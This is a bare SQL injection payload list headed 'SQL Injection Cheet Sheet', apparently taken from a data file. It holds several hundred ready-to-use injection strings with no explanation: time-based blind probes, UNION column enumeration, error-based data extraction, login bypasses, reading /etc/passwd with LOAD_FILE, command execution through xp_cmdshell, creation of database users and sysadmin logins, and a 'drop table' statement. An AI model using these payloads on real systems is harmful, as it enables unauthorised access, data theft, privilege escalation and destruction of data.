 SQL Injection Cheet Sheet"},{"string":
 and 0=benchmark(3000000,MD5(1))%20%23
 and 0=benchmark(3000000,MD5(1))%20--
 waitfor delay '0:0:20' --
 waitfor delay '0:0:20' /* 
" and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20/*
" waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /* 
") and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20/*
") waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /* 
")%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20/*
")) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /* 
"))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /* 
")))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /* 
"))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /* 
")))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /* 
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
%23%23 SELECT * FROM users 
%31%27%20%4F%52%20%27%31%27%3D%27%31
&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
&#x31;&#x27;&#x20;&#x4F;&#x52;&#x20;&#x27;&#x31;&#x27;&#x3D;&#x27;&#x31;
' /*!50000or*/1='1
' /*!or*/1='1
' ; drop table temp --
' UNION ALL SELECT LOAD_FILE('/etc/passwd') 
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10--
' UNION SELECT ALL 1,2,3,4,5,6,7,8,9--
' UNION SELECT ALL 1,2,3,4,5,6,7,8--
' UNION SELECT ALL 1,2,3,4,5,6,7--
' UNION SELECT ALL 1,2,3,4,5,6--
' UNION SELECT ALL 1,2,3,4,5--
' UNION SELECT ALL 1,2,3,4--
' UNION SELECT ALL 1,2,3--
' UNION SELECT ALL 1,2--
' UNION SELECT ALL 1--
' and 'x'='x
' and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20/*
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
' grant connect to name; grant resource to name; --
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
' ooor 1=1 #
' or 1=1 --
' or 1=1 union select 1,2 as `
' or 1=1#
' or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1– –
' or username is not NULL or username = '
' or#newline
' or– -newline
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
' waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /* 
' || 1=1 #
'&&1='1
') and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20/*
') or 1=1 ][(' or
') waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /* 
')%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')) and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20/*
')) waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /* 
'))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /* 
')))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /* 
'))))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /* 
')))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /* 
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'-'
'/path/location/on/server/www/passes.txt'
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
'='
'=== stored(blog)==='
'==== GET Search ==='
'OR '' = '	Allows authentication without a valid username.
'OR 1=1--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users; 
'exec sp_addlogin 'name' , 'password' --
'||1='1
(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--
(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end)
) and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20/*
) waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /* 
)%20waitfor%20delay%20'0:0:20'%20--
)%20waitfor%20delay%20'0:0:20'%20/*
)) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20/*
)) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /* 
))%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20/*
))) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /* 
)))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /* 
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
--
/*
0' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,@@version--
0' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,database()--
0' UNION SELECT ALL 1,2,3,4,5,6,7,8,9,user()--
0' UNION SELECT ALL 1,2,3,4,5,6,7,8,@@version,10--
0' UNION SELECT ALL 1,2,3,4,5,6,7,8,database(),10--
0' UNION SELECT ALL 1,2,3,4,5,6,7,8,user(),10--
0' UNION SELECT ALL 1,2,3,4,5,6,7,@@version,9,10--
0' UNION SELECT ALL 1,2,3,4,5,6,7,database(),9,10--
0' UNION SELECT ALL 1,2,3,4,5,6,7,user(),9,10--
0' UNION SELECT ALL 1,2,3,4,5,6,@@version,8,9,10--
0' UNION SELECT ALL 1,2,3,4,5,6,database(),8,9,10--
0' UNION SELECT ALL 1,2,3,4,5,6,user(),8,9,10--
0' UNION SELECT ALL 1,2,3,4,5,@@version,7,8,9,10--
0' UNION SELECT ALL 1,2,3,4,5,database(),7,8,9,10--
0' UNION SELECT ALL 1,2,3,4,5,user(),7,8,9,10--
0' UNION SELECT ALL 1,2,3,4,@@version,6,7,8,9,10--
0' UNION SELECT ALL 1,2,3,4,database(),6,7,8,9,10--
0' UNION SELECT ALL 1,2,3,4,user(),6,7,8,9,10--
0' UNION SELECT ALL 1,2,3,@@version,5,6,7,8,9,10--
0' UNION SELECT ALL 1,2,3,database(),5,6,7,8,9,10--
0' UNION SELECT ALL 1,2,3,user(),5,6,7,8,9,10--
0' UNION SELECT ALL 1,2,@@version,4,5,6,7,8,9,10--
0' UNION SELECT ALL 1,2,database(),4,5,6,7,8,9,10--
0' UNION SELECT ALL 1,2,user(),4,5,6,7,8,9,10--
0' UNION SELECT ALL 1,@@version,3,4,5,6,7,8,9,10--
0' UNION SELECT ALL 1,@@version,3,4,5,6,7,8,9--
0' UNION SELECT ALL 1,@@version,3,4,5,6,7,8--
0' UNION SELECT ALL 1,@@version,3,4,5,6,7--
0' UNION SELECT ALL 1,@@version,3,4,5,6--
0' UNION SELECT ALL 1,@@version,3,4,5--
0' UNION SELECT ALL 1,@@version,3,4--
0' UNION SELECT ALL 1,@@version,3--
0' UNION SELECT ALL 1,database(),3,4,5,6,7,8,9,10--
0' UNION SELECT ALL 1,table_name,2 from information_schema.tables--
0' UNION SELECT ALL 1,table_name,2,3,4 from information_schema.tables--
0' UNION SELECT ALL 1,table_name,2,3,4,5 from information_schema.tables--
